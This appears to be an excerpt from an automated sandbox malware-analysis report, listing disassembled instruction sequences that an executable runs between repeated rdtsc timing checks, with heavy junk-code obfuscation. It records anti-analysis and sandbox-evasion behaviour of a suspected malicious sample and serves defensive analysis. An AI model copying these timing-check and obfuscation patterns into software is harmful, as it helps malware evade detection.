                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53609E4 second address: 5360A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0DD08F41C1h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 jmp 00007F0DD08F41C8h 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F0DD08F41C0h 0x0000001f push eax 0x00000020 jmp 00007F0DD08F41BBh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360A54 second address: 5360A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360A58 second address: 5360A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360A73 second address: 5360A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 337745CAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+14h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0DD1497E6Ah 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360A8F second address: 5360AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, 75F6h 0x00000013 mov ah, bl 0x00000015 popad 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360AE4 second address: 5360AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360AEA second address: 5360AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5360AEE second address: 5360AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370C61 second address: 5370C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41C8h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370C7D second address: 5370C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0DD1497E6Dh 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370C95 second address: 5370CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41BCh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370CA5 second address: 5370CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370CA9 second address: 5370CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0DD08F41C7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370CD1 second address: 5370CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5370CD5 second address: 5370CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53F06A1 second address: 53F06A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53F06A5 second address: 53F06A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53F06A9 second address: 53F06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53F06AF second address: 53F0727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0DD08F41C8h 0x00000009 sub ax, 4E88h 0x0000000e jmp 00007F0DD08F41BBh 0x00000013 popfd 0x00000014 jmp 00007F0DD08F41C8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F0DD08F41BBh 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F0DD08F41C6h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov di, B360h 0x00000031 movsx ebx, ax 0x00000034 popad 0x00000035 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53F0727 second address: 53F072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53F072D second address: 53F0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 538006A second address: 5380070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380070 second address: 53800C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0DD08F41C6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cl, bl 0x00000018 pushfd 0x00000019 jmp 00007F0DD08F41C6h 0x0000001e or esi, 11A8F378h 0x00000024 jmp 00007F0DD08F41BBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0C1E second address: 53E0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0C2D second address: 53E0CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 42h 0x00000005 jmp 00007F0DD08F41C0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F0DD08F41BBh 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 push ecx 0x00000016 mov si, dx 0x00000019 pop edx 0x0000001a mov eax, 73E9AAA3h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov ax, CB1Bh 0x00000027 pushad 0x00000028 mov cx, D6CDh 0x0000002c jmp 00007F0DD08F41BAh 0x00000031 popad 0x00000032 popad 0x00000033 push dword ptr [ebp+0Ch] 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F0DD08F41BEh 0x0000003d add ecx, 01721F18h 0x00000043 jmp 00007F0DD08F41BBh 0x00000048 popfd 0x00000049 push eax 0x0000004a push edx 0x0000004b call 00007F0DD08F41C6h 0x00000050 pop eax 0x00000051 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0CB4 second address: 53E0CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push dword ptr [ebp+08h] 0x00000008 jmp 00007F0DD1497E6Ch 0x0000000d call 00007F0DD1497E69h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0CD7 second address: 53E0CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0CDB second address: 53E0CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0CE1 second address: 53E0D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0DD08F41C0h 0x0000000b adc eax, 41B8B308h 0x00000011 jmp 00007F0DD08F41BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0D11 second address: 53E0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 4B4D7B76h 0x00000009 popad 0x0000000a mov cx, dx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 mov bh, ah 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0DD1497E6Ch 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F0DD1497E6Bh 0x00000028 pop eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0D4D second address: 53E0D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0D72 second address: 53E0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0D78 second address: 53E0D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, eax 0x00000010 jmp 00007F0DD08F41BEh 0x00000015 popad 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0D97 second address: 53E0DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 call 00007F0DD1497E6Ah 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0DD1497E73h 0x00000019 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0DC3 second address: 53E0DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0DC7 second address: 53E0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53E0DCD second address: 53E0DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41BBh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C8C416 second address: C8C420 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390434 second address: 5390443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390443 second address: 539045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4F18F68Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DD1497E6Ah 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53905F1 second address: 53905F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53905F5 second address: 53905FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53905FB second address: 5390601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390601 second address: 5390605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390605 second address: 5390609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390609 second address: 53906C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F0DD1497E75h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 pushfd 0x00000015 jmp 00007F0DD1497E73h 0x0000001a xor ah, 0000005Eh 0x0000001d jmp 00007F0DD1497E79h 0x00000022 popfd 0x00000023 pop ecx 0x00000024 mov edi, 28017DD4h 0x00000029 popad 0x0000002a mov eax, dword ptr fs:[00000000h] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F0DD1497E74h 0x00000037 and ecx, 1A844988h 0x0000003d jmp 00007F0DD1497E6Bh 0x00000042 popfd 0x00000043 popad 0x00000044 nop 0x00000045 jmp 00007F0DD1497E76h 0x0000004a push eax 0x0000004b jmp 00007F0DD1497E6Bh 0x00000050 nop 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 movsx ebx, si 0x00000057 mov cl, 06h 0x00000059 popad 0x0000005a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53906C1 second address: 53906C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53906C7 second address: 5390749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 1Ch 0x0000000e jmp 00007F0DD1497E70h 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b mov dl, E3h 0x0000001d pushfd 0x0000001e jmp 00007F0DD1497E6Eh 0x00000023 jmp 00007F0DD1497E75h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b jmp 00007F0DD1497E6Eh 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F0DD1497E77h 0x00000038 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390749 second address: 5390775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DD08F41BCh 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390775 second address: 5390787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD1497E6Eh 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390787 second address: 539078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 539078B second address: 53907E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov di, 4F70h 0x0000000e call 00007F0DD1497E79h 0x00000013 pushfd 0x00000014 jmp 00007F0DD1497E70h 0x00000019 sbb ecx, 2672FEE8h 0x0000001f jmp 00007F0DD1497E6Bh 0x00000024 popfd 0x00000025 pop esi 0x00000026 popad 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0DD1497E6Bh 0x0000002f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53907E5 second address: 5390847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0DD08F41BAh 0x00000014 or cl, FFFFFFA8h 0x00000017 jmp 00007F0DD08F41BBh 0x0000001c popfd 0x0000001d popad 0x0000001e mov eax, edi 0x00000020 popad 0x00000021 mov eax, dword ptr [76FBB370h] 0x00000026 pushad 0x00000027 mov cx, bx 0x0000002a mov si, di 0x0000002d popad 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F0DD08F41C0h 0x00000038 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390847 second address: 539090C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0DD1497E71h 0x00000009 sub cl, 00000026h 0x0000000c jmp 00007F0DD1497E71h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xor eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F0DD1497E78h 0x0000001e or ecx, 184EE5F8h 0x00000024 jmp 00007F0DD1497E6Bh 0x00000029 popfd 0x0000002a call 00007F0DD1497E78h 0x0000002f jmp 00007F0DD1497E72h 0x00000034 pop esi 0x00000035 popad 0x00000036 push ebp 0x00000037 jmp 00007F0DD1497E6Eh 0x0000003c mov dword ptr [esp], eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F0DD1497E6Eh 0x00000046 and al, FFFFFFE8h 0x00000049 jmp 00007F0DD1497E6Bh 0x0000004e popfd 0x0000004f mov ch, 15h 0x00000051 popad 0x00000052 lea eax, dword ptr [ebp-10h] 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov cl, C4h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 539090C second address: 5390911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390911 second address: 5390917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390917 second address: 539091B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 539091B second address: 5390946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e pushad 0x0000000f jmp 00007F0DD1497E78h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390946 second address: 539094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 539094A second address: 5390992 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0DD1497E6Eh 0x00000008 and esi, 725B09D8h 0x0000000e jmp 00007F0DD1497E6Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0DD1497E76h 0x00000028 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390992 second address: 53909A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53909A1 second address: 53909A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53909A7 second address: 53909AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53909AB second address: 53909F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F0DD1497E76h 0x00000012 jne 00007F0E42FC71B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0DD1497E77h 0x0000001f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53909F3 second address: 53909F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53909F9 second address: 5390A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d pushad 0x0000000e mov dl, 42h 0x00000010 pushfd 0x00000011 jmp 00007F0DD1497E6Eh 0x00000016 or cx, 5DB8h 0x0000001b jmp 00007F0DD1497E6Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [ebp-20h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390A39 second address: 5390A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390A3D second address: 5390A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390A43 second address: 5390AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0DD08F41C8h 0x00000009 xor ch, 00000048h 0x0000000c jmp 00007F0DD08F41BBh 0x00000011 popfd 0x00000012 call 00007F0DD08F41C8h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebx, dword ptr [esi] 0x0000001d jmp 00007F0DD08F41C1h 0x00000022 mov dword ptr [ebp-24h], ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0DD08F41BDh 0x0000002c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390AAF second address: 5390AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390AB5 second address: 5390AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390AB9 second address: 5390ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5390ABD second address: 5390B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ebx, ebx 0x0000000a jmp 00007F0DD08F41BFh 0x0000000f je 00007F0E4242335Dh 0x00000015 pushad 0x00000016 call 00007F0DD08F41C4h 0x0000001b mov ax, 8DF1h 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0DD08F41BDh 0x00000027 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380E89 second address: 5380E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
